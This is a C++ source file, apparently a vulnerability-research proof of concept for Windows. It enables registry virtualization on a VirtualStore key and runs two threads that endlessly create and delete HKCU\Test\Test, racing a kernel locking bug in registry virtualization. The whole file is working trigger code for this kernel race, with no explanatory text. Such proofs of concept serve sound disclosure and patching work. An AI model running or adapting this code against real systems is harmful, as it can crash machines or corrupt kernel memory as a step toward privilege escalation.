#define _CRT_SECURE_NO_WARNINGS
#define WIN32_NO_STATUS
#include <Windows.h>
#undef WIN32_NO_STATUS
#include <winternl.h>
#include <ntstatus.h>
#include <sddl.h>

#include <cstdio>

#pragma comment(lib, "ntdll")

extern "C" {

NTSTATUS NTAPI NtDeleteKey(HANDLE KeyHandle);

}  // extern "C"

typedef struct _KEY_SET_VIRTUALIZATION_INFORMATION {
  ULONG   VirtualTarget : 1; // Tells if the key is a virtual target key.
  ULONG   VirtualStore : 1;  // Tells if the key is a virtual store key.
  ULONG   VirtualSource : 1; // Tells if the key has been virtualized at least one (virtual hint)
  ULONG   Reserved : 29;
} KEY_SET_VIRTUALIZATION_INFORMATION, * PKEY_SET_VIRTUALIZATION_INFORMATION;

BOOL EnableTokenVirtualization(HANDLE hToken, BOOL bEnabled) {
  DWORD dwVirtualizationEnabled = bEnabled;
  if (!SetTokenInformation(hToken,
                           TokenVirtualizationEnabled,
                           &dwVirtualizationEnabled,
                           sizeof(dwVirtualizationEnabled))) {
    printf("SetTokenInformation failed with error %u\n", GetLastError());
    return FALSE;
  }

  return TRUE;
}

BOOL EnableKeyVirtualization(HKEY hkey,
                             BOOL VirtualTarget,
                             BOOL VirtualStore,
                             BOOL VirtualSource) {

  KEY_SET_VIRTUALIZATION_INFORMATION VirtInfo;
  VirtInfo.VirtualTarget = VirtualTarget;
  VirtInfo.VirtualStore = VirtualStore;
  VirtInfo.VirtualSource = VirtualSource;
  VirtInfo.Reserved = 0;

  NTSTATUS Status = NtSetInformationKey(hkey,
                                        KeySetVirtualizationInformation,
                                        &VirtInfo,
                                        sizeof(VirtInfo));

  return NT_SUCCESS(Status);
}

DWORD WINAPI ThreadProc(LPVOID lpParameter) {
  //
  // Indefinitely create and delete HKCU\Test\Test, which is simultaneously
  // being traversed by registry virtualization without having the hive locked.
  //

  while (1) {
    HKEY hTestKey;
    LONG st = RegCreateKeyExW(HKEY_CURRENT_USER,
                              L"Test\\Test",
                              0,
                              NULL,
                              REG_OPTION_VOLATILE,
                              KEY_ALL_ACCESS,
                              NULL,
                              &hTestKey,
                              NULL);

    if (st == ERROR_SUCCESS) {
      NtDeleteKey(hTestKey);
      RegCloseKey(hTestKey);
    }
  }

  return 0;
}

int wmain() {
  LONG st;

  //
  // Format the key path to be created in the VirtualStore, and then create
  // the key structure.
  //

  HANDLE hToken;
  if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)) {
    wprintf(L"OpenProcessToken failed with error %u\n", GetLastError());
    return 1;
  }

  DWORD UserInfoLength;
  if (GetTokenInformation(hToken, TokenUser, NULL, 0, &UserInfoLength) ||
      GetLastError() != ERROR_INSUFFICIENT_BUFFER) {
    wprintf(L"GetTokenInformation failed with error %u\n", GetLastError());
    return 1;
  }

  TOKEN_USER* UserInfo = (TOKEN_USER*)malloc(UserInfoLength);

  if (!GetTokenInformation(hToken, TokenUser, UserInfo, UserInfoLength, &UserInfoLength)) {
    wprintf(L"GetTokenInformation failed with error %u\n", GetLastError());
    return 1;
  }

  LPWSTR StringSid;
  if (!ConvertSidToStringSidW(UserInfo->User.Sid, &StringSid)) {
    wprintf(L"ConvertSidToStringSidW failed with error %u\n", GetLastError());
    return 1;
  }

  CONST SIZE_T RegistryPathLength = (wcslen(StringSid) + 36) * sizeof(WCHAR);
  PWSTR RegistryPathBuffer = (PWSTR)malloc(RegistryPathLength);

  if (RegistryPathBuffer == NULL) {
    wprintf(L"Failed to allocate registry path buffer\n");
    return 1;
  }

  RegistryPathBuffer[0] = L'\0';
  wcscat(RegistryPathBuffer, L"Software\\Classes\\VirtualStore\\User\\");
  wcscat(RegistryPathBuffer, StringSid);

  HKEY hVirtualKey;
  st = RegCreateKeyExW(HKEY_CURRENT_USER,
                       RegistryPathBuffer,
                       0,
                       NULL,
                       REG_OPTION_VOLATILE,
                       KEY_ALL_ACCESS,
                       NULL,
                       &hVirtualKey,
                       NULL);

  if (st != ERROR_SUCCESS) {
    wprintf(L"RegCreateKeyExW failed with error %d\n", st);
    return 1;
  }

  //
  // Enable virtualization for our process and for the virtual key.
  //

  EnableTokenVirtualization(hToken, TRUE);

  if (!EnableKeyVirtualization(hVirtualKey,
                               /*VirtualTarget=*/TRUE,
                               /*VirtualStore=*/ TRUE,
                               /*VirtualSource=*/FALSE)) {
    wprintf(L"Failed to enable virtualization for the key\n");
    return 1;
  }

  //
  // Create the concurrent thread that repeatedly creates and deletes the test
  // key in HKCU.
  //

  CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ThreadProc, NULL, 0, NULL);

  //
  // Indefinitely trigger registry virtualization and the bad locking bug.
  //

  while (1) {
    HKEY hTestKey;

    st = RegCreateKeyExW(hVirtualKey,
                         L"Test\\Test",
                         0,
                         NULL,
                         REG_OPTION_VOLATILE,
                         KEY_ALL_ACCESS,
                         NULL,
                         &hTestKey,
                         NULL);

    if (st == ERROR_SUCCESS) {
      NtDeleteKey(hTestKey);
      RegCloseKey(hTestKey);
    }
  }

  RegCloseKey(hVirtualKey);

  return 0;
}
